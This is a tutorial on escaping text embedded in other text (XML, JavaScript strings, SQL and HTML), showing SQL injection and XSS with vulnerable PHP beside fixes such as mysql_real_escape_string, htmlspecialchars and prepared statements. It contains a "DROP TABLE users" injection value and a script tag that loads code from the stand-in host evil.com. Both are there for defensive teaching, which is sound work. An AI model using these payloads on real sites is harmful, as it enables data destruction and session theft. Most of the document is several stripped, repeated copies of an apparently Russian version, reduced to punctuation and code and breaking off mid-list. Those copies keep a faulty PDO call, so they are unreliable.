SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

But what happens when the text itself needs one of those special characters? XML has reserved the angle bracket: "<" means "a tag starts here". So what if the article is about math and says "x < n"? The parser sees "<", tries to read a tag, finds none and gives up on the whole document. The rules of the outer text (XML) and the content of the inner text (the article) are in conflict.

XML solves this by defining replacements for its special characters. This is how the mathematical text gets into the document:

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


That is all it takes. When the parser meets "&lt;" it knows that this stands for a literal "<", and "&gt;" stands for ">", and neither is taken as the start or end of a tag.

This technique, neutralizing characters that would otherwise have a special meaning, is called escaping.

escape |iˈskāp| [ no obj. ] [...] [ with obj. ] [...] / [ with obj. ] IT: cause (a character) to be treated as literal text rather than as part of the syntax [...]

Escaping means exactly what the dictionary says: the escaped character "escapes" its special meaning. It is a way of telling the parser: "this is not one of your special characters, this is just text, understood?" The parser, which follows the same rules we do, understands and puts the plain character back.

Now, what about the ampersand (&)? It has become a special character itself: it is the escape character. So how do you write a literal "&lt;" in an XML document, for instance in an article about XML escaping? By escaping the ampersand too: in XML it is written as "&amp;". The two characters "&<" therefore become "&amp;&lt;", and the parser turns them back into "&<".
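The escaping described above, as an added Python example that is not part of the original article: a minimal xml_escape, the same three replacements in the wrong order, and a real XML parser (xml.etree.ElementTree) reading the result back. The document layout follows the page's article example; the second sample text, the function names and the comparison against xml.sax.saxutils.escape are this example's own.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape as stdlib_escape


def xml_escape(text):
    """Escape text for XML character data. The ampersand is replaced first:
    it is the escape character, and replacing it after the angle brackets
    would re-escape the '&' of the '&lt;' and '&gt;' just produced."""
    return text.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")


def xml_escape_wrong_order(text):
    """The same replacements, ampersand last, to show what goes wrong."""
    return text.replace("<", "&lt;").replace(">", "&gt;").replace("&", "&amp;")


def agrees_with_stdlib(text):
    """Sanity check: xml.sax.saxutils.escape applies the same replacements."""
    return xml_escape(text) == stdlib_escape(text)


def build_article(author, contents, escape=xml_escape):
    """The page's <article> document with author and contents embedded."""
    return (
        '<?xml version="1.0" encoding="UTF-8" ?>'
        "<article>"
        f"<author>{escape(author)}</author>"
        f"<contents>{escape(contents)}</contents>"
        "</article>"
    )


def read_contents(document):
    """Parse with a real XML parser and return the text of <contents>,
    or None if the document is not well-formed."""
    try:
        root = ET.fromstring(document)
    except ET.ParseError:
        return None
    return root.findtext("contents")


# Sample texts: the first is the page's own, the second is constructed here.
MATH = "Basic math tells us that if x < n and y > n, x cannot be larger than y."
ABOUT_ESCAPING = "In XML, & is written &amp; and < is written &lt;"


def demo():
    """What each strategy makes of the sample texts after a round trip."""
    return {
        "unescaped": read_contents(build_article("Homo Sapiens", MATH, escape=lambda s: s)),
        "escaped": read_contents(build_article("Homo Sapiens", MATH)),
        "wrong order": read_contents(
            build_article("Homo Sapiens", ABOUT_ESCAPING, escape=xml_escape_wrong_order)),
        "right order": read_contents(build_article("Homo Sapiens", ABOUT_ESCAPING)),
    }


if __name__ == "__main__":
    for strategy, result in demo().items():
        print(f"{strategy:12}: {result!r}")
```

The unescaped document is rejected by the parser outright. The wrong-order version is well-formed, which is the more dangerous failure: it parses without complaint, but the literal "<" in the text comes back as the four characters "&lt;".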





XML is not the only language in which one text ends up inside another. Practically every programming language has the same thing in the form of string literals. Take this JavaScript:

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

The quotation marks mark where the string starts and where it ends: everything between them is data, everything outside is program. That is the rule, and it works nicely for this too:

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

No problem at all! Angle brackets mean nothing special inside a JavaScript string; only the quotation mark does. Which brings us to this:

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

...and that breaks. The parser sees the second quotation mark and decides that the string ends right there, after "said ", and the rest of the line is garbage it cannot make sense of. We have exactly the XML problem again: the inner text contains a character that the outer language uses for its own purposes. The solution is the same as well, a way to write a "literal quotation mark":

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

The backslash "\" is the escape character: it tells the parser that the next character is just text, not one of the special characters. Of course, that makes the backslash itself special, so if you want a literal backslash in your string you have to escape it too: "\\". Text within text within text. Still with me?

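The two rules just described (a backslash makes the next character literal, an unescaped quote ends the string), as an added Python example that is not from the article: a small parser for double-quoted literals, applied to the page's Plato sentence both pasted in naively and escaped. The parser is deliberately limited to those two rules (real JavaScript also knows \n, \t, \uXXXX and more); the path sample and the function names are this example's own assumptions.

```python
def escape_string_literal(text):
    """Prepare text for a double-quoted JavaScript-style literal: escape the
    escape character first, then the delimiter."""
    return text.replace("\\", "\\\\").replace('"', '\\"')


def parse_string_literal(source):
    """Read one double-quoted literal from the start of source.
    Rule 1: a backslash makes the following character literal.
    Rule 2: an unescaped double quote ends the string.
    Returns (value, remaining source)."""
    if not source.startswith('"'):
        raise ValueError("expected an opening quote")
    chars = []
    i = 1
    while i < len(source):
        c = source[i]
        if c == "\\":
            if i + 1 >= len(source):
                raise ValueError("escape character at end of input")
            chars.append(source[i + 1])  # whatever follows is taken literally
            i += 2
        elif c == '"':
            return "".join(chars), source[i + 1:]
        else:
            chars.append(c)
            i += 1
    raise ValueError("unterminated string literal")


def embed_naively(text):
    """What the page's broken example does: paste the text between quotes."""
    return 'var contents = "' + text + '";'


def embed_escaped(text):
    """The page's fixed example: escape, then paste."""
    return 'var contents = "' + escape_string_literal(text) + '";'


def read_back(statement):
    """Skip the 'var contents = ' prefix and parse the literal that follows."""
    prefix = "var contents = "
    if not statement.startswith(prefix):
        raise ValueError("not a contents assignment")
    return parse_string_literal(statement[len(prefix):])


# The page's sentence, plus a constructed text with backslashes in it.
PLATO = 'Plato is said to once have said "Lorem ipsum dolor sit amet".'
WINDOWS_PATH = 'The file lives in C:\\temp\\"quoted name".txt'


if __name__ == "__main__":
    for text in (PLATO, WINDOWS_PATH):
        print("naive  :", read_back(embed_naively(text)))
        print("escaped:", read_back(embed_escaped(text)))
```

For the naive version the parser returns a truncated value and a tail of leftover characters that a real interpreter would reject as a syntax error; for the escaped version the value comes back unchanged and only the closing semicolon remains.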


Important!

This is the whole point. Whenever one text is placed inside another, the inner text has to stay inside the slot reserved for it and must never be able to "break out" into the rules of the outer text. Every character that means something in the outer format has to be neutralized. As long as all of the text is written by you, the programmer, that is merely a question of getting the syntax right. The moment the inner text comes from somewhere else, say from a user of your web site, it becomes a question of security: if the user's text ends up inside an HTML page as-is, the user can write HTML, and the browser will treat that HTML as part of your page, because it has no way of telling the difference.



The best known case is SQL injection. A SQL query is, once again, just text:

SELECT phone_number FROM users WHERE name = 'Alex'

A program hands this text to the database; the database parses it, executes it and returns the phone number. In PHP that might look like this:

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

Note that we already have text within text here: PHP code with a SQL query inside a string. Nothing bad can happen, because the query was written by the programmer and the database receives exactly what was intended.



But of course the name is rarely a constant; usually it comes from a form on a web page. So the code becomes:

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

Stop right there! Now we have text within text within text: PHP, inside it SQL, and inside that a string that came from a user! Anybody on the Internet gets to write part of our database query! Alarm!



Think about what happens here. $_POST['name'] is whatever somebody typed into the form, and it is pasted straight into the query text. The database receives the glued-together string and parses it as SQL. It has no way of knowing which part the programmer wrote and which part the user wrote; the quotes that were supposed to mark the user's text as "just data" are characters like any other.



What can go wrong? Let's see what the query looks like for a few different inputs:



1. Alex
   SELECT phone_number FROM users WHERE name = 'Alex'

2. Mc'Donalds
   SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

3. Joe'; DROP TABLE users; --
   SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

See the problem? The second one already breaks: the apostrophe in the name is taken by the database as the end of the string, and the "Donalds" after it is a syntax error. Annoying, but harmless. The third one is the nasty one: it is perfectly valid SQL. Do you see what it does?...

Right... the quote ends the string, the semicolon ends the statement, and what follows is a second statement. The database is asked to look up Joe and then to drop the users table (the trailing "--" turns the leftover quote into a comment, so nothing gets in the way). The user has written part of our program. That is SQL injection.



This is not a theoretical problem. Web sites are broken into this way every day, although the technique has been known for more than ten years. And SQL injection is only the most famous example: exactly the same thing happens wherever text from an untrusted source is embedded into another text, be it HTML, a shell command, a file path and so on. Wherever the embedded text can "break out" of its slot, it can do damage.



One more!

Second example: XSS, cross-site scripting. The same thing, this time in HTML.

Suppose we run a forum. Users write posts, we store them in a database and show them to everybody else, which is what a forum is for. The PHP template that renders a post looks something like this:

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

A post by a well-behaved user comes out like this:

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

Now a post by a mathematician, whose text contains angle brackets. They are special in HTML, but browsers are forgiving, and a stray "<" followed by a space is usually still displayed as text, so this one still more or less works:

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

...but only by luck. What if somebody posts this?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

See what happens? The browser finds a script tag in the page, loads the JavaScript from evil.com and runs it, in the browser of every visitor who opens the page, with all the rights of a script belonging to our site: it can read the visitor's cookies, act on their behalf, rewrite the page. That is XSS.





In both cases the user's text was able to "break out" of the slot it was given, because the characters that are special in the outer text (the quote in SQL, the angle bracket in HTML) were passed through untouched. How do we stop that?



Forbid apostrophes in names? Forbid angle brackets in posts? Bolt on a filter that looks for "dangerous" words? No. Escape!

Escaping means exactly what it meant for XML and JavaScript above. For a string inside a SQL query in PHP the function is mysql_real_escape_string:

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

Now every special character in the user's text is neutralized before the text goes into the query. The same three inputs produce these queries:

1. Alex
   SELECT phone_number FROM users WHERE name = 'Alex'

2. Mc'Donalds
   SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

3. Joe'; DROP TABLE users; --
   SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string puts a backslash in front of every character that is special inside a MySQL string literal, so the database reads \' as a literal apostrophe and the string ends where the programmer's quote is. Mc'Donalds is looked up correctly, and the DROP TABLE is just a very strange name that matches nobody. Two caveats a practitioner should keep in mind: escaping only protects a value that sits inside quotes, so WHERE id = $id without quotes stays injectable no matter how well $id is escaped; and the mysql_* functions were removed in PHP 7, their replacements being mysqli_real_escape_string or, better, prepared statements (see below).



And for HTML:

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars replaces the characters that are special in HTML (<, >, &, ") with their entities, just like the XML example at the beginning. The JackTR post now renders as:

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

The browser shows the visitor the literal text of the script tag and runs nothing, because there is no tag anymore: the text could not "break out" of its slot. Note that htmlspecialchars is specific to HTML text and attribute values. It is not enough if the value lands inside a script block or a URL within the page, and in PHP versions before 8.1 it leaves single quotes alone unless you pass ENT_QUOTES.
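The forum template and its htmlspecialchars fix, as an added Python example (not the article's PHP): html.escape does the same job as htmlspecialchars, and html.parser.HTMLParser stands in for the browser to count how many script elements the rendered post actually contains. The three posts are the page's; the function and constant names are this example's own.

```python
import html
from html.parser import HTMLParser

# The page's template, with the PHP echo statements turned into placeholders.
POST_TEMPLATE = (
    '<div class="post"> <p class="meta"> Posted by {username} on {date} </p> '
    '<p class="body"> {body} </p> </div>'
)


def render_post_unsafe(post):
    """The page's first template: user text pasted straight into the HTML."""
    return POST_TEMPLATE.format(**post)


def render_post(post):
    """The fixed template: every user-supplied value goes through html.escape,
    Python's counterpart of htmlspecialchars. The date is produced by the
    server, not by the user, so it is left alone, as on the page."""
    return POST_TEMPLATE.format(
        username=html.escape(post["username"]),
        date=post["date"],
        body=html.escape(post["body"]),
    )


class TagCollector(HTMLParser):
    """Records the start tags a browser-like parser sees in the document."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(document):
    parser = TagCollector()
    parser.feed(document)
    parser.close()
    return parser.tags


def script_tags(post, renderer):
    """How many <script> elements the rendered post contains."""
    return tags_in(renderer(post)).count("script")


# The page's three posts (dates are the page's strings, not computed).
PLATO = {"username": "Plato", "date": "January 2, 15:31",
         "body": 'I am said to have said "Lorem ipsum dolor sit amet."'}
PASCAL = {"username": "Pascal", "date": "November 23, 04:12",
          "body": "Basic math tells us that if x < n and y > n, x cannot be larger than y."}
JACKTR = {"username": "JackTR", "date": "July 18, 12:56",
          "body": '<script src="http://evil.com/dangerous.js" '
                  'type="text/javascript" charset="utf-8"></script>'}


if __name__ == "__main__":
    for post in (PLATO, PASCAL, JACKTR):
        print(post["username"], "unsafe:", script_tags(post, render_post_unsafe),
              "escaped:", script_tags(post, render_post))
```

With the unsafe template the JackTR post yields a real script element; with the escaped one the parser sees only the div and the two paragraphs, and the body text is exactly the entity-encoded string the page shows.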



Summing up...

The rule is simple: whenever you put one text into another, escape it according to the rules of the outer text. Going into SQL? Escape for SQL. Going into HTML? Escape for HTML. Going into a shell command? Quote for the shell. Going into a URL? URL-encode it. Every time, for every piece of text that did not come from you.





Escaping is not the only tool. A few related techniques, which combine well with it:

Validation

Check that the input is what you expect it to be and reject it otherwise. If a field is supposed to contain a number, "DROP TABLE users" clearly is not one, while "42" is. Validation does not replace escaping: a perfectly valid name such as Mc'Donalds still contains a quote, and a perfectly valid comment may contain "<", so the value still has to be escaped before it is embedded in HTML or SQL. But it cuts down what an attacker can smuggle in, and it catches mistakes early.

Sanitization

Sanitization means changing the input so that it can no longer do harm, for instance stripping all HTML tags out of a comment. Unlike escaping, it destroys information; unlike validation, it accepts anything. Use it when you really want the special characters gone, not when you want them displayed.

Prepared SQL statements

Prepared statements solve the SQL problem at the root: the query text and the values are sent to the database separately, so the values are never parsed as SQL and there is nothing to escape. In PHP with PDO:

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute([$_POST['name']]); // execute() takes an array of values, one per placeholder

The question mark is a placeholder. The value bound to it may contain quotes, semicolons or anything else; the database treats it as a value and nothing more. No escaping, nothing to forget.
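The injection from the SQL section, the escaped version, and the prepared statement just shown, run for real, as an added Python example that is not part of the article: an in-memory SQLite database stands in for MySQL, so the DROP TABLE hurts nobody. escape_sql_string doubles quotes, the standard SQL convention, rather than the backslash convention of mysql_real_escape_string; executescript stands in for a driver that permits stacked statements, which the page's example presupposes. The sample rows and the function names are constructed for this example.

```python
import sqlite3

# Constructed sample rows for the page's users table (not from the page).
USERS = [("Alex", "555-0100"), ("Mc'Donalds", "555-0101"), ("Joe", "555-0102")]

# The page's three inputs.
INPUTS = ["Alex", "Mc'Donalds", "Joe'; DROP TABLE users; --"]


def fresh_db():
    """A throwaway in-memory database, so the DROP TABLE does no damage."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, phone_number TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def users_table_exists(conn):
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = 'users'"
    ).fetchone()
    return row is not None


def build_query_unsafe(name):
    """The page's vulnerable pattern: the value is glued into the SQL text."""
    return f"SELECT phone_number FROM users WHERE name = '{name}'"


def escape_sql_string(value):
    """Escape a value for a single-quoted SQL literal by doubling each quote
    (standard SQL: SQLite, PostgreSQL, ...). mysql_real_escape_string uses a
    backslash instead; the idea is the same."""
    return value.replace("'", "''")


def build_query_escaped(name):
    return f"SELECT phone_number FROM users WHERE name = '{escape_sql_string(name)}'"


def lookup_unsafe(conn, name):
    """Run the unescaped query through executescript, which executes every
    statement it finds, like a driver that allows stacked statements.
    Returns (query_ok, users_table_still_there)."""
    ok = True
    try:
        conn.executescript(build_query_unsafe(name))
    except sqlite3.Error:
        ok = False  # e.g. the syntax error caused by Mc'Donalds
    return ok, users_table_exists(conn)


def lookup_escaped(conn, name):
    """Escaping keeps the value inside its quotes: always a single statement."""
    return [row[0] for row in conn.execute(build_query_escaped(name))]


def lookup_prepared(conn, name):
    """Prepared statement: SQL text and value travel separately; nothing to escape."""
    return [row[0] for row in conn.execute(
        "SELECT phone_number FROM users WHERE name = ?", (name,))]


def demo():
    """Result of each strategy for each input, each on a fresh database."""
    return {
        name: {
            "unsafe": lookup_unsafe(fresh_db(), name),
            "escaped": lookup_escaped(fresh_db(), name),
            "prepared": lookup_prepared(fresh_db(), name),
        }
        for name in INPUTS
    }


if __name__ == "__main__":
    for name, results in demo().items():
        print(repr(name), results)
```

The unsafe path breaks on Mc'Donalds and loses the users table on the third input; the escaped and prepared paths return the right phone number for the first two inputs and an empty result, with the table intact, for the third. Of the two, the prepared statement is the one to use: it cannot be undermined by a forgotten call or a value dropped in without quotes.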





That is all there is to it. Whenever text (data) is placed inside another text (code), the data has to follow the rules of the code it lands in: it has to be escaped, or better still kept apart from the code altogether. "Injection" is simply the name for what happens when it is not. Which characters are special depends on the outer text, so the escaping function has to match it: SQL escaping for SQL, HTML escaping for HTML, and prepared statements wherever the database offers them (HTML has no equivalent, so there you escape).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

